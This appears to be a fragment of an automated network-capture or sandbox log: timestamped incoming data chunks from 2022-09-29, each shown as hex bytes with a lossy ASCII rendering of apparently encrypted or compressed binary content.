                                                                                                                                                            2022-09-29 12:45:03 UTC8993INData Raw: 0c 78 d4 31 d8 3a 93 a4 26 af f4 0e 1b f7 ec d2 c1 0a 47 63 f5 4d 2f f4 75 d6 a3 a7 f0 7c 62 e9 10 1c a2 fe f9 2f 1c fb 70 0f 60 36 9d 90 80 4d 16 9d 60 14 f2 b8 e9 22 a3 9d 1d 09 64 37 65 6e 69 47 ab 2c 18 9d 1e c6 e3 f6 dd 6c 8b df 83 24 cd 51 10 9d 9b a1 9e 4e f2 dd ab b4 a3 21 58 40 32 8f c9 45 c4 09 ea 0c 9f ee 6a 40 78 e8 81 ed f7 f5 c4 e6 fe 35 15 f1 10 ec 30 58 ef 43 12 ca 28 b8 15 f7 16 8f c1 23 e5 ae f5 27 87 b9 ca 9b 84 ef cf 44 6d 85 55 05 bb 22 88 92 22 d2 3e b6 1f 84 ec 66 5a b7 18 23 c1 c4 24 e7 1c b3 56 89 1b 2d 94 ee c9 df 7e c1 fd de 91 a8 de c1 d0 ac ae a6 93 9e 89 ce e4 28 6a 53 7c 4c 2c 2c a4 e5 91 e4 29 9d 3c e1 56 7a 35 be 18 ec 15 fa 87 2a 2e e0 d4 31 68 47 c8 72 3b d0 55 a1 69 0d cb 16 4e ce d6 07 61 0a dc 9a 2f aa 2b 3e 67 8e 6a
                                                                                                                                                            Data Ascii: x1:&GcM/u|b/p`6M`"d7eniG,l$QN!X@2Ej@x50XC(#'DmU"">fZ#$V-~(jS|L,,)<Vz5*.1hGr;UiNa/+>gj
                                                                                                                                                            2022-09-29 12:45:03 UTC8995INData Raw: 42 17 b4 01 79 98 99 81 50 b3 a0 cf bb ff 8f ef 78 eb 24 9d 5b cf 92 82 0d 41 f8 e9 89 26 05 21 3e a9 de 1c 26 dc 61 0d a1 d6 43 31 aa 74 00 c8 38 da 3f d8 ea a0 38 97 d2 c0 82 36 3e d3 90 48 15 5f 22 1d 16 6a 4e a2 d5 bc 92 30 4d 8e 41 0f 56 2d 62 f5 b5 47 76 69 4a 14 ba 4a 7f c0 bf fe 11 77 38 e6 8d 40 d8 36 a9 51 7c 50 24 69 95 a5 d3 6f 99 66 2c 22 af 3e 5c 7c b2 77 05 ef 08 b1 34 aa 5e 50 2c 6a c7 39 52 a1 b0 6e 3e 86 89 7b 26 de 4b 20 34 1c f9 27 4d e9 b1 60 cb 7d c3 aa b3 93 e3 5c aa 91 4a be 82 df 87 96 bc 21 28 c9 40 4a 4c 40 11 fd ad 7e 8f 96 df a5 c3 c7 be 3f 0d 84 61 ea 55 f5 54 f8 a2 f9 14 80 f8 e2 e4 b6 6f 42 36 45 7d 82 35 76 84 b2 02 88 a1 94 70 af 75 43 cc 8d e8 29 86 ee 4b c7 2c 61 5b d2 f9 22 87 23 9d 83 37 e9 91 aa ed bf 18 55 61 07 31
                                                                                                                                                            Data Ascii: ByPx$[A&!>&aC1t8?86>H_"jN0MAV-bGviJJw8@6Q|P$iof,">\|w4^P,j9Rn>{&K 4'M`}\J!(@JL@~?aUToB6E}5vpuC)K,a["#7Ua1
                                                                                                                                                            2022-09-29 12:45:03 UTC8996INData Raw: 89 81 53 62 0c 4d 39 a7 fd c9 ee 61 7d b9 52 68 8d ec 28 54 3f 55 03 0e c7 b1 21 75 4f a4 0f 36 04 99 61 af 70 42 6e fd c3 0c 97 02 21 04 4a bf 0c 9e aa 3c cb 22 16 14 c6 8d ed e5 1d d2 4e 2c 18 23 d6 24 13 4c 1f a9 d9 22 6b 19 24 5a 16 df a2 b4 04 cf b1 f2 12 d1 66 fa b9 be c1 81 36 58 44 98 62 ec 72 83 6a cd bd f3 c1 b1 9d 21 36 97 1e c8 4d 4e e2 7c 81 a9 d4 27 63 03 d4 33 01 2f ab 29 d2 75 cc 32 03 c0 07 21 bf 62 ff b7 16 0b 8b c4 47 cc f4 84 9a 04 1e 50 35 2f a2 7d 36 9e 80 ac e9 e2 ab f4 ca 2e c8 69 e0 ce ad 23 2e 5f d6 44 ae bb 09 24 80 73 06 49 86 bd f1 08 30 60 21 4e 6e 0c b1 03 b7 58 a6 2c 06 8c e7 f6 68 ef 54 dd f7 35 61 55 9f cd 55 ad 27 36 08 02 c5 77 88 23 6f 33 f1 00 ec 48 5c 2b 97 5e ff 99 ea be d3 08 e9 ef 94 23 22 5f cc 72 81 4f 74 03 1f
                                                                                                                                                            Data Ascii: SbM9a}Rh(T?U!uO6apBn!J<"N,#$L"k$Zf6XDbrj!6MN|'c3/)u2!bGP5/}6.i#._D$sI0`!NnX,hT5aUU'6w#o3H\+^#"_rOt
                                                                                                                                                            2022-09-29 12:45:03 UTC8997INData Raw: 14 b0 db 98 6d e2 9c 79 a5 c4 8d ee 34 83 7e 34 f5 d2 d4 3a ff b7 09 ae 87 61 16 0b a4 50 84 a0 81 3e f5 a6 03 cf 3e cc f4 f3 74 cf 04 fe 4f 9c 45 5a 86 52 a6 cf 29 9c 01 84 a2 03 f0 ff 50 3c d4 a9 0b b9 a3 80 05 2b 95 4b a8 2a 5b 81 81 3b 32 50 1a 8d 21 6d 4c ab c6 12 ca ee f8 88 dd 5d 43 74 2b 76 a7 50 9e 5d ce ec 2d 07 2b 90 93 7a 9e c0 c9 bf dc 0f c0 07 41 4f 0e dc 35 8a 40 9a 02 37 a7 63 d3 55 d9 0c e9 4b a2 78 80 99 0e 07 10 1f c6 34 bb 7e a0 86 ef 47 c8 36 10 e7 b4 a0 77 62 bc ad 6e 45 db e2 1e 39 7e 30 87 8d 8a 08 f4 7d 13 37 a0 c2 6d 22 8c 4a 76 a4 75 fb 67 c4 c5 da e2 d0 59 b6 da ba 72 c5 02 95 e4 67 32 39 fa 61 54 6b bf da 12 c5 27 be 38 5b 7f 4f 32 a1 1e f8 bf 6d c9 63 86 f5 10 88 f0 02 bc ed 70 7d 3d 87 fa 52 60 4e a6 21 0b 5b e9 e0 45 1c 40
                                                                                                                                                            Data Ascii: my4~4:aP>>tOEZR)P<+K*[;2P!mL]Ct+vP]-+zAO5@7cUKx4~G6wbnE9~0}7m"JvugYrg29aTk'8[O2mcp}=R`N![E@
                                                                                                                                                            2022-09-29 12:45:03 UTC8999INData Raw: 5a 42 29 bf 84 e7 c5 79 c8 c7 d5 d7 57 14 41 ca 20 f1 9f dd bd ee 15 d9 12 17 18 fc 54 14 16 78 e8 76 7f 3b 10 84 9b b6 d0 e6 cc 48 bf 70 d9 3a 2f ab 76 d2 ca 08 7e b5 ef f8 e8 77 41 a3 79 f7 82 e9 14 02 9f 1c e7 ad dc 83 d8 a9 a1 27 0b 88 92 da 84 d3 4a 89 aa 42 89 34 ff e8 0e 69 c9 c5 fb c8 48 a3 1f b7 b6 c3 55 7d d8 aa 3c d8 d5 2a 02 19 ca 6f 2a ab db 99 76 65 ee b0 e7 46 ef 29 9c 28 a3 8c 1c ed a4 ad 4b f7 40 07 95 5c 26 61 bd 74 ed 13 a7 3c 49 86 f8 c7 09 2e 6e bf 57 1f 34 4d 7c 2f 24 ed 86 fa da bb 47 09 7d 0d a6 e5 2c 96 74 8d b9 6e 27 45 18 73 f7 00 55 8d bb a8 ba 53 36 b8 94 81 d9 d5 23 16 dc cb 48 a5 4c f5 a7 4a 26 60 28 c2 9e 05 3b 15 38 ba 96 91 77 cb f1 29 26 3c 1f eb 3c f9 6d 75 6b 87 71 20 19 74 ee a9 67 31 71 da a6 42 50 31 5a be 31 2a 5b
                                                                                                                                                            Data Ascii: ZB)yWA Txv;Hp:/v~wAy'JB4iHU}<*o*veF)(K@\&at<I.nW4M|/$G},tn'EsUS6#HLJ&`(;8w)&<<mukq tg1qBP1Z1*[
                                                                                                                                                            2022-09-29 12:45:03 UTC8999INData Raw: 30 17 8d ed 36 ad 37 70 da 8a f7 82 c1 01 6c 3e 98 85 2a 19 ba 58 4c 08 07 9f 45 07 bc b2 65 77 57 1a ac ef 29 58 32 75 b9 c5 64 d8 5f 90 c0 8e 05 2b 06 b3 3b e2 4f 27 2e 9c ee 30 33 1b fa 09 6c e6 3c 0b 58 d3 b4 9a 92 5a cf 39 b7 3c 40 42 e1 92 8c 49 41 2e 17 ba c9 9f 9c 24 c9 9b a1 a6 e9 e3 78 60 14 41 51 bb 72 e6 d3 00 65 07 19 c4 b8 ba a7 64 4e 4c c0 54 e1 8e b9 5d 69 db 82 29 85 2c 0c 13 67 40 30 7d 38 14 e7 cd cb 7a 82 84 14 e1 ae 4a 92 5c ce 60 05 cb 06 ec 9f 5d 8a cd 30 53 4b 36 77 0f c7 b7 73 5a ef 5a cb bb bb b2 40 0b 8b 71 84 7d 36 f6 c4 78 f3 cc 14 83 d8 95 21 63 79 81 20 8e de 7f 30 6f cc 08 e9 80 55 45 d9 0f 2d 61 d7 ed fb b4 92 85 7e e9 21 28 4f 3b 16 54 b1 f6 29 24 17 7f 19 dd 8f 28 86 ec 0e ba 9f c8 56 ae 56 a5 96 2e ee 12 f8 c5 47 d4 07
                                                                                                                                                            Data Ascii: 067pl>*XLEewW)X2ud_+;O'.03l<XZ9<@BIA.$x`AQredNLT]i),g@0}8zJ\`]0SK6wsZZ@q}6x!cy 0oUE-a~!(O;T)$(VV.G
                                                                                                                                                            2022-09-29 12:45:03 UTC9015INData Raw: 86 27 9a 24 38 1d 78 76 bc 68 54 b8 04 6a 1d 3b 46 21 ab c5 84 6c 3f 35 20 02 3d 9f c7 f2 ab bf 06 23 80 48 e6 b9 70 29 9d bb 90 d4 f3 8b 59 ac 5d 19 47 69 0f 6e fd 6a 72 9c bb 25 97 0c 64 f7 89 e8 bf 10 33 ae c2 af d7 11 66 e7 97 4a 02 e3 da f1 f0 14 92 7e 47 8e 4a f6 6e 9b d2 0a 13 66 72 85 39 05 3e b5 3e 67 91 63 0c 8b 87 1a 73 b4 47 17 63 5e b7 5f 38 32 6e 1e da 4c 97 d3 ab bc 1a b1 1f 25 58 d5 05 72 27 c3 49 73 96 89 83 5b 1a 79 fe a7 e6 05 d6 69 10 22 48 23 2c b0 4c cf 48 0d 43 46 d5 c0 66 da 60 fd e7 32 39 f5 24 e4 8f e3 9e 98 c7 9f 59 17 79 8c b2 df e9 3c 56 46 2f e7 84 f6 ac ef c6 b2 0d 74 6b 6a 55 7b 3f e7 7a fb 51 f5 2c e3 53 35 82 5c 0b 61 6a 99 16 76 00 8a 52 ca a5 c3 95 2f de f7 22 93 83 94 17 93 3b 2c 1a ce e5 c9 17 e3 77 ad 81 2e d8 d6 77
                                                                                                                                                            Data Ascii: '$8xvhTj;F!l?5 =#Hp)Y]Ginjr%d3fJ~GJnfr9>>gcsGc^_82nL%Xr'Is[yi"H#,LHCFf`29$Yy<VF/tkjU{?zQ,S5\ajvR/";,w.w
                                                                                                                                                            2022-09-29 12:45:03 UTC9031INData Raw: 27 d1 41 91 7e 4f d7 f0 4c c4 23 2d 0a 77 0e 82 f2 72 58 e7 19 c1 ef 3f de 10 b7 d3 3f 1c a4 1a c5 51 03 19 e8 4c 2f a2 29 1f 0e 8c 56 5e 92 5f 0f f7 6b cd 1d ad f1 8a 82 f2 66 2c 08 ca 70 ca 84 e4 16 fe 4d d2 41 d1 06 f8 ae bd 96 5d ec 99 55 86 aa b3 b5 41 6f 15 43 c9 cd 40 76 fe 84 e9 92 07 eb f6 25 ee 3e 26 5e 5c b9 d1 ad 01 e9 20 aa 80 e3 02 1a c8 bc 96 8b d1 9a c0 93 8d 3e c6 fe 3f c0 57 27 2b 34 27 56 06 12 fd 83 d8 88 41 d9 b3 88 5d 92 dd 07 0a be b1 58 43 d4 11 4b 11 69 f7 c5 70 c7 cc 52 d2 95 c3 d0 59 5d 99 7e d0 03 2a 5a 11 d6 c9 cb be 73 d0 cb 4a a8 30 51 c5 46 18 ef fe 3d de e0 6b fd 72 5d ef a9 fc 5c b6 6d 45 65 a7 67 40 fd 7d b9 d9 be fb 6d b5 df 6b 2b 49 f8 99 2e a4 f5 f3 34 ab a6 2d 83 43 95 72 4c 7f 3e 45 fd 8a 82 2b b5 86 3e 82 78 95 69
                                                                                                                                                            Data Ascii: 'A~OL#-wrX??QL/)V^_kf,pMA]UAoC@v%>&^\ >?W'+4'VA]XCKipRY]~*ZsJ0QF=kr]\mEeg@}mk+I.4-CrL>E+>xi
                                                                                                                                                            2022-09-29 12:45:03 UTC9047INData Raw: 98 87 97 de 34 a3 82 a5 9c 0d b7 b8 d5 5f a7 50 94 07 98 cc 6f c9 6b e6 92 49 3c ec 48 63 f2 d1 de df bc 19 9e 88 8f 8e 73 e8 bd b2 25 83 52 95 58 e3 e9 45 fa a4 f7 26 53 94 7f 3d 03 65 6d e0 bb cb 94 de 40 a9 16 b0 92 e9 86 60 51 d5 92 df f4 40 3b 3c 86 cb 07 52 a9 19 d8 39 8e 67 8e 28 67 00 47 03 93 65 b8 aa b6 97 54 da ff 75 44 6f 7a 02 43 11 5f 42 95 2a c2 1f 44 ad b7 37 53 d9 2f 10 e4 29 d6 cd 80 8c 33 51 22 01 8c 3c f9 42 e0 b5 68 ea f7 62 19 80 34 2b aa a9 ed 64 f7 eb d5 5a 9b 0c 0e 60 0b 90 7f d5 75 f5 d8 05 eb 26 fc 4a 37 3c 93 c1 c4 74 56 b6 09 36 b0 7a 18 ee b2 79 f6 0a 79 cd d6 28 97 54 66 29 29 2d cc 3c f2 01 93 fd 01 67 4a 7c ff 82 6d ee b2 01 49 42 99 78 92 33 b6 63 bd 69 c5 78 64 01 87 9f 10 f1 8d dd 41 0c fb fc a3 af 55 ab db 4e 55 25 aa
                                                                                                                                                            Data Ascii: 4_PokI<Hcs%RXE&S=em@`Q@;<R9g(gGeTuDozC_B*D7S/)3Q"<Bhb4+dZ`u&J7<tV6zyy(Tf))-<gJ|mIBx3cixdAUNU%
                                                                                                                                                            2022-09-29 12:45:03 UTC9063INData Raw: 25 fa 64 41 d4 d7 e3 98 b0 5d 9d 2b 31 6b 43 f0 b5 a8 f1 4d 5a 26 41 28 b4 dd d3 f9 c0 bb f6 d1 5a 82 69 e3 1d e8 be a2 a5 42 b8 2c 64 77 2c 22 b4 8d 7a 78 db 2a b7 f0 4c 0d 11 6e 3c fc a2 f3 68 5f 53 67 e6 3c 10 5b cc 14 3b a5 9f d0 5c 67 d4 e9 c1 d9 47 69 5a 8c f3 0f a3 f1 1d 01 a2 ed 01 97 07 26 d5 0d 6f ee dd 8b a0 79 0f 91 ca 58 a1 1b 96 3d 8d b6 6c 28 95 de 63 a0 2b 10 05 a4 39 a2 e7 8a 58 6a 31 0c 3d 6f 10 cc 54 3f e3 d0 e9 b7 b3 dc 02 09 89 f2 94 24 62 f2 16 43 42 a3 3a e1 43 a5 ea 33 6c ae 9f 60 f2 1e 61 5d bd fc ae 22 20 16 ed 75 d0 3a af da 0f 0a ea 82 6d d9 e6 c7 f7 f9 49 ff 77 0d 1d 3e b9 37 cf 73 51 f3 77 1e 4b 8e da f3 d5 98 92 f4 54 58 71 e2 dd fd 69 93 3a ca 3c 52 aa 83 3c fa 60 1c 02 77 bd 89 36 de e9 e8 2b 51 75 01 a6 33 30 6d e5 94 bf
                                                                                                                                                            Data Ascii: %dA]+1kCMZ&A(ZiB,dw,"zx*Ln<h_Sg<[;\gGiZ&oyX=l(c+9Xj1=oT?$bCB:C3l`a]" u:mIw>7sQwKTXqi:<R<`w6+Qu30m
                                                                                                                                                            2022-09-29 12:45:03 UTC9079INData Raw: aa 3b 36 40 42 ca be 46 f7 92 01 50 10 1b a2 b9 0e 9c 67 31 03 2f 92 df b6 c0 23 b0 ff 0d 10 11 f2 47 8b bc 03 c5 20 b4 1e 2e 58 75 01 a3 23 3e a3 69 27 75 35 c3 06 cc e1 e0 33 70 bc a8 3c f5 9c c2 00 31 bf 08 21 21 2b 2a 5a 10 8f 7b b8 89 92 a4 81 aa 75 6d c3 35 28 d1 e2 4e 2a 5d f9 c8 23 47 e1 72 68 59 f1 d0 f5 e3 91 24 04 0a 03 37 7a b3 3b ac ec 1a 8b 12 5a ae 80 62 7e 34 b6 35 fd 75 10 17 f7 9c 4c 6c 87 26 62 81 5f 60 21 e9 ed 71 5f 0f 59 c8 93 33 9f 6b 8c 3b b9 b7 e7 b1 57 35 82 6f 36 27 1d 27 82 ea 89 20 80 b3 12 3a eb 6e b9 c5 b9 46 bc 40 9e bd b6 b7 67 14 34 e8 72 d0 e1 95 e0 91 39 b2 23 d5 93 00 24 5c e4 83 49 a6 c9 8e e6 58 3b be 9b 12 6d 9d 5c db 49 45 46 b7 16 46 e2 f0 bd df f1 c3 52 68 43 7f f3 a3 0f a1 9a 61 e6 08 a7 29 98 2a 58 03 3d 84 16
                                                                                                                                                            Data Ascii: ;6@BFPg1/#G .Xu#>i'u53p<1!!+*Z{um5(N*]#GrhY$7z;Zb~45uLl&b_`!q_Y3k;W5o6'' :nF@g4r9#$\IX;m\IEFFRhCa)*X=
                                                                                                                                                            2022-09-29 12:45:03 UTC9095INData Raw: 2a c9 a8 4b 54 92 a5 e4 9a f9 c8 52 89 82 57 4c 46 12 2a 49 c4 f2 66 29 84 e5 0b 1b b8 c2 85 ea 0d e7 38 07 07 4b eb 0d e0 79 9e af 55 31 59 d4 64 0d fc 29 94 1f 3a 87 54 22 af 51 69 d5 7b b1 07 14 cc b2 6c ab 44 db ec 59 92 fb fb f7 78 e2 17 72 39 b1 6b 0a 4d 50 ab 7d 9a 22 88 8e 93 0c 98 63 20 37 0e 0d ca 45 48 b3 4d 75 a5 82 3e 30 da f4 c9 a6 b6 93 67 95 36 65 e3 d6 54 14 d4 83 29 f5 d4 75 34 2c a0 c2 ba 11 ea 15 0d ee d4 e2 2c 50 c3 4f e6 90 d0 57 57 4f d7 d8 8d d7 02 20 0b 47 a4 32 03 68 ea a5 a3 e0 8b df 94 b8 b6 73 70 76 a1 de cf 2e 42 81 45 10 cb ca 39 68 58 0e 53 32 8c 99 d8 14 9c f2 cd 02 92 b6 9c fb 1f fe f1 0c 79 ab ff 07 ef 28 c2 a2 78 e4 0d 14 b4 ab b1 cb 99 9b 89 35 41 25 cd da 63 d6 d1 02 fc 5f df 86 be 19 dd 93 e4 b5 51 ae e8 71 b9 0b 23
                                                                                                                                                            Data Ascii: *KTRWLF*If)8KyU1Yd):T"Qi{lDYxr9kMP}"c 7EHMu>0g6eT)u4,,POWWO G2hspv.BE9hXS2y(x5A%c_Qq#
                                                                                                                                                            2022-09-29 12:45:03 UTC9111INData Raw: 85 d9 d5 1f 57 5f 7e c3 6b ae 52 55 91 65 5b f7 4e 69 15 a3 99 7c c4 18 f0 ac d3 9d 5c 3f 4e e9 ce 5b 66 f6 26 3f c4 74 b0 ad 07 c1 f6 fb b5 37 fd 9d 5b fa e5 bf bf a3 7f c6 05 23 03 06 3a a8 20 26 a6 e0 6c 5f cb 41 9e 07 16 f5 8a 4f 87 b4 e7 37 18 b9 61 fb 99 c7 98 9c 08 db 17 99 39 14 ed 4c 5c d0 69 d9 8b 61 d5 7f 4e 9f 27 92 b9 12 78 5b bf c2 a9 45 b2 0b 67 7b c2 bb b0 8e 41 f3 92 0e 9a 0f eb d9 74 9e d5 c9 04 50 db c1 11 2f 99 3b f1 27 e5 92 e1 da 1e 4a f6 e2 74 91 5f 85 e3 9e 49 2f ec c1 df be 42 83 6c 84 56 73 5c c7 71 eb 56 c8 f2 90 9b 11 6d 0c 9f 9a 31 f4 66 8b 14 f4 c4 fe 15 5d 8a 0d c2 f9 c3 93 d3 d1 d1 a9 dc d1 3a c3 67 f3 89 d1 5c 2d 49 be ba 2d 92 ca 5a 59 a2 c3 d1 dd c9 ce 63 4f 56 d9 c3 72 f4 81 97 5b 33 57 db c4 50 56 7b 7d 59 d3 69 62 e1
                                                                                                                                                            Data Ascii: W_~kRUe[Ni|\?N[f&?t7[#: &l_AO7a9L\iaN'x[Eg{AtP/;'Jt_I/BlVs\qVm1f]:g\-I-ZYcOVr[3WPV{}Yib
                                                                                                                                                            2022-09-29 12:45:03 UTC9127INData Raw: f2 f5 98 f9 77 55 b4 02 ca c1 b8 5f db 78 f2 08 49 1e b2 cc e8 e2 5c 47 75 a1 98 7c 0f 23 c9 60 cb 9e 6c ba 13 16 19 ff 35 0f 10 f5 c9 c7 6c 1c 5a 3c bc 7e ea f7 3f d9 d5 69 30 a4 36 86 cb 8d 22 d4 cb fc 64 83 b2 73 38 b2 67 b2 e5 9a 08 6b da 19 95 0e 38 94 b7 06 cb 24 79 c0 c3 c1 20 ad 38 03 19 1b c3 28 e6 03 f0 07 85 01 ba 17 37 36 4c c3 ca 86 95 18 d9 73 c9 4c f4 b9 04 07 25 37 c8 8d 01 74 44 65 e2 4a 58 1d f9 c3 bc d8 3a 8b fb 75 95 45 bb 62 ed 7b 56 2c a3 a4 1b 20 58 7e 03 71 a2 6d 4e b4 a2 9b e3 01 06 bd 44 6d 95 c9 57 ad 2a 4d 92 3b 60 2c 2a cc 47 fc 10 be 65 8a de 94 66 c7 9f ce 1e 5e 19 9d eb 34 2d 1d 44 38 b9 3f 8a ea 90 5e 0c 68 ce 76 95 e1 aa 07 72 45 9e f9 3c 4b 66 a0 71 bf f8 ad d5 9c 8a 1e cd df a2 31 59 cb 81 a0 62 11 48 23 60 5b 7b 09 d8
                                                                                                                                                            Data Ascii: wU_xI\Gu|#`l5lZ<~?i06"ds8gk8$y 8(76LsL%7tDeJX:uEb{V, X~qmNDmW*M;`,*Gef^4-D8?^hvrE<Kfq1YbH#`[{
                                                                                                                                                            2022-09-29 12:45:03 UTC9143INData Raw: 45 90 82 47 d5 32 ba 1b 09 2f 8d 65 c5 d8 a9 d9 ba ce 18 20 f7 82 c4 81 a6 d1 f6 ee 3a 74 f8 04 e4 6a f2 b2 e2 fe c4 8f c9 6a 19 07 0a 53 38 08 29 87 c5 56 a0 a9 a3 fb dc d9 e0 7b 53 57 c9 e9 cc 60 3d 7d b5 cb a7 f0 7a 3e 68 39 a8 60 c3 97 cb a0 57 e9 c4 cb 33 37 e7 11 fb a5 8f 8e cb fc 38 c2 7a 8a 36 15 10 c8 f2 2a 56 c1 89 fc 04 7d 6b 70 eb f8 b2 88 73 cc 45 a1 a0 4f 4b fc de 32 66 76 01 37 9e b2 b9 80 5f d3 d9 92 02 66 4d f5 4f 6d 35 c1 4f 5c a3 4c e5 c4 22 ab 96 4d e8 f4 a0 27 ca 21 ae a0 02 3c 3e 11 c3 53 34 0b ac 67 7e 40 08 62 91 05 5b 2c 1f c8 53 69 81 e8 f6 0f 66 cf f7 6f ff 9f e6 04 18 2f 51 6a 6d d7 39 85 b3 89 db 0d cd 6b a7 16 dd 73 04 59 8b a7 de f7 d0 63 90 73 dd 77 c3 4d 05 af 69 f4 8b 63 7a a4 c3 9b 8d b1 d1 7d 72 df da e4 47 e9 08 d1 13
                                                                                                                                                            Data Ascii: EG2/e :tjjS8)V{SW`=}z>h9`W378z6*V}kpsEOK2fv7_fMOm5O\L"M'!<>S4g~@b[,Sifo/Qjm9ksYcswMicz}rG
                                                                                                                                                            2022-09-29 12:45:03 UTC9159INData Raw: 0a 11 9d 7e 85 61 b4 ef 90 ba d5 fa da 5c f8 ce 7a a0 53 f1 b8 9a 19 d5 8b a9 85 2b 2c 4e db f2 bf 53 0f 2e 4e 70 b8 93 ee 63 00 9e 2c 22 c9 71 23 43 f1 2d bb 73 30 2a 48 0f 83 7d 32 4a 14 7d bf ee fd 94 a9 bc 55 d8 05 7a 8b 79 7f fe 7b 9a ad 97 f9 65 e4 02 ac 5a 48 cd 48 d2 78 b9 91 bf 61 92 2d 23 3d 9b c9 50 11 ed 33 6b 93 d9 65 b9 b2 54 51 5a f6 13 47 79 a1 ff 19 08 51 a5 49 db 8c 36 25 4f 8d b6 6d aa 55 f4 3e 99 6f 50 ae 43 9d 73 38 95 a2 4e e1 06 51 49 58 b6 54 ea 6c 9a a4 76 21 f0 d5 2c ac 46 bf 36 f6 af ed 02 d7 0f 3e 6e 9c b8 10 19 f6 7e ab 35 bf c2 5b 5a 86 e4 cd ab 27 56 c7 b1 4a d9 7b 27 a3 bc a4 b7 d8 17 68 9c 74 c8 04 89 42 31 2b c4 a8 8d 53 b1 8d e5 0e 4e e0 21 bf 94 4e 3a 19 d4 47 34 2d 3b d2 65 51 8b 11 fd 02 3b 61 ef 0f 06 42 96 88 4d d7
                                                                                                                                                            Data Ascii: ~a\zS+,NS.Npc,"q#C-s0*H}2J}Uzy{eZHHxa-#=P3keTQZGyQI6%OmU>oPCs8NQIXTlv!,F6>n~5[Z'VJ{'htB1+SN!N:G4-;eQ;aBM
                                                                                                                                                            2022-09-29 12:45:03 UTC9175INData Raw: c0 66 4e a2 a7 85 ff fb 27 e5 f5 04 67 cb af a5 d7 3d 07 49 f0 22 d7 80 de 9d ab 12 ce 29 27 b3 f2 5b c2 38 cb ff 86 de 50 15 66 da 03 30 d5 5e a2 18 aa 74 28 d3 17 1f d2 d9 8f 0c bd 9d 70 f1 82 09 12 a3 07 9f bd 55 56 ae 61 b5 09 cc 92 7d 8b ea ce 1a 72 8a 3d 11 d3 89 d3 74 24 1b 83 21 7c 34 43 10 17 b5 16 48 1d 41 f0 f9 9e 0c 7b 2a 34 e7 6f dc d6 73 c7 3e 14 9c 4e fb 93 ae 1a db 74 68 8d 05 41 ab 87 d1 22 74 c2 e3 b9 31 d8 9b 84 87 56 97 41 39 ce f4 40 6d a6 72 76 d6 de d8 78 5b 7c ba 00 c6 08 69 82 eb 8c d8 c8 a3 f9 a0 3b d4 27 a6 5a e4 05 ca 83 93 b4 37 36 b5 57 bf be b3 d7 fd a4 3a 40 44 c4 1e 57 f3 13 18 0e 24 27 b1 bb f8 eb 34 e8 c0 5d 3a e1 d3 3a 8a 90 ba 46 50 1a 72 fb e3 03 cb f7 e3 56 01 3e b6 74 92 36 6f b0 c4 fe fc d9 6d 45 eb e5 b4 79 c7 cb
                                                                                                                                                            Data Ascii: fN'g=I")'[8Pf0^t(pUVa}r=t$!|4CHA{*4os>NthA"t1VA9@mrvx[|i;'Z76W:@DW$'4]::FPrV>t6omEy
                                                                                                                                                            2022-09-29 12:45:03 UTC9191INData Raw: 16 1a ba 68 d7 fe 2e de a5 3d e3 63 76 69 07 52 64 86 fa dd 31 06 ba 58 90 7e 37 46 6b 91 d6 30 87 4c 6a fe 12 9d 37 51 81 4b 41 e1 76 7e 89 81 e5 79 78 41 7f 06 1f e7 f2 9d bc a3 93 06 bb e2 58 b8 29 46 72 9a 04 9d 28 f9 dd bf 83 39 ea 17 26 d0 86 bb 2d 6c 0e cd bb f7 23 c8 50 27 3d b9 ee d6 7c 2b 33 80 c3 9f b4 10 c5 2b d3 ed 43 89 53 e0 28 29 6e ea 16 74 89 8f aa b3 ae 79 b3 ab 09 1b e2 54 b1 fa cb 06 dc ac ac c8 cd 13 fe 40 70 d6 23 f7 3a fd 9b 5b 8b 31 00 01 5e e6 25 04 00 8a 0b 12 74 36 19 13 1a 28 7f e6 df fc fb 9a ee 0b 40 ed 9e 7f e4 93 71 48 68 ac 93 99 0b 68 03 0d 72 48 46 b0 65 5c 60 b5 09 f3 0d f7 e5 79 f1 1f 93 3d 97 4b 96 8f df a1 56 bd 73 50 6c 98 44 65 fb b9 e2 4f 45 b8 8d e9 27 0f 9f 63 f9 f8 63 99 4a f9 49 47 17 3e 67 3b 89 4e bb c8 3c
                                                                                                                                                            Data Ascii: h.=cviRd1X~7Fk0Lj7QKAv~yxAX)Fr(9&-l#P'=|+3+CS()ntyT@p#:[1^%t6(@qHhhrHFe\`y=KVsPlDeOE'ccJIG>g;N<
                                                                                                                                                            2022-09-29 12:45:03 UTC9207INData Raw: 4c f3 64 bb de 60 8e cf c1 5d 6e ca a2 3b b1 8c d1 84 7b 9d 18 1e c4 1f 70 76 23 f9 dc d7 12 32 93 4d 1b 73 b4 de ef a8 06 00 6b cc 28 78 58 05 c3 06 ab b6 89 27 fd ee 28 f8 8c 04 2c e9 ae 7f 2c 57 6b fe a6 1c 0e ce 43 69 f2 da 9a 61 7e 9c a1 45 7f 45 f3 c2 ba 13 b6 ec e2 5e 5c 0c ce 5b 51 2b 75 af 64 a5 f1 03 47 43 d8 41 44 4a ed 95 8a a3 89 e9 35 ab 4c c9 f4 75 7a f2 f3 e7 d2 3d ba 34 16 ac 39 ec 8c 4c fd 5e 61 1e e1 e2 07 94 4d f9 04 15 93 f0 87 d5 81 6d a9 33 a1 3c 37 52 81 71 89 06 9a f2 fe ea 1e 32 ec c1 1c bc 06 3d 98 59 c4 0b 48 f9 93 ac 1c a6 ea ee 2c 87 26 cd 0e 1a 03 cf 56 bf a2 89 df f7 ee 4e 3b 14 23 2d 6e 09 4a 6c cd 76 ad b3 87 c0 bc 56 52 4f f8 5a 03 f6 b5 3d 98 84 a2 17 b6 4f ba 1a ee 4e 97 01 7a 9d ab b8 ca d4 03 84 ab d9 9e 5a e1 e2 ec
                                                                                                                                                            Data Ascii: Ld`]n;{pv#2Msk(xX'(,,WkCia~EE^\[Q+udGCADJ5Luz=49L^aMm3<7Rq2=YH,&VN;#-nJlvVROZ=ONzZ
